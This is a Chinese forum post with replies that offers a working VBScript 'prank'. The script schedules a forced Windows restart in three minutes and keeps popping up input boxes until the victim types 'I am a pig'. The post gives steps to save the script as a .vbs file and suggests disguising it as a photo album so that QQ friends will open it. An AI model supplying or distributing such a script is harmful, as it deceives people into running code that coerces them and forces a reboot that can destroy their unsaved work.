设为首页收藏本站淘宝杂货铺

从F到0 - From F to 0

注册已关闭
搜索

vbs整人代码不说“我是猪”,就关机的VBS整人代码

今天给大家带来一个整人的VBS脚本,对方不说“我是猪”就定时关机的恶搞脚本,如果把他发给你的QQ好友 他不懂的话如果不输“我是猪“” 电脑就会在你设定的时间内关机。我在以下代码内设置的是3分钟。
1、新建文本文档,复制代码。

1. on error resume next

2. dim WSHshellA

3. set WSHshellA = wscript.createobject("wscript.shell")

4. WSHshellA.run "cmd.exe /c shutdown -r -t 180 -c ""说我是猪,不说我是猪就一分钟关你机,不信,你试试···"" ",0 ,true

5. dim a

6. do while(a <> "我是猪")

7. a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)

8. msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

9. loop

10. msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵,猪"

11. dim WSHshell

12. set WSHshell = wscript.createobject("wscript.shell")

13. WSHshell.run "cmd.exe /c shutdown -a",0 ,true

14. msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"

复制代码

其中,cmd.exe /c shutdown -r -t 180 -c这里的数字可以修改关机时间为任意(秒)
2、保存记事本文档,把txt文件的后缀名txt改成vbs。可以把名字写成如“我的相册.vbs”吸引人的字眼。
如果不说“我是猪”或者输入其他字的话,就会重复窗口,直到说“我是猪”为止。

这个有意思
老外遇到这玩意就只能靠智商关闭了。
Kuni7wa 发表于 2017-9-18 09:57
老外遇到这玩意就只能靠智商关闭了。

这个也不一定,程序猿靠win+r,别的也有的不一样。
呵呵呵,只有楼主是猪别的都不是。
小萌 发表于 2017-7-30 09:17
呵呵呵,只有楼主是猪别的都不是。

呵呵呵呵
楼猪咋又把这玩意放出来了呢?》》?
没错只有楼猪是猪。
水一帖走人。
路过而已,其实这玩意是某论坛大神发明的,现出现在了各大论坛。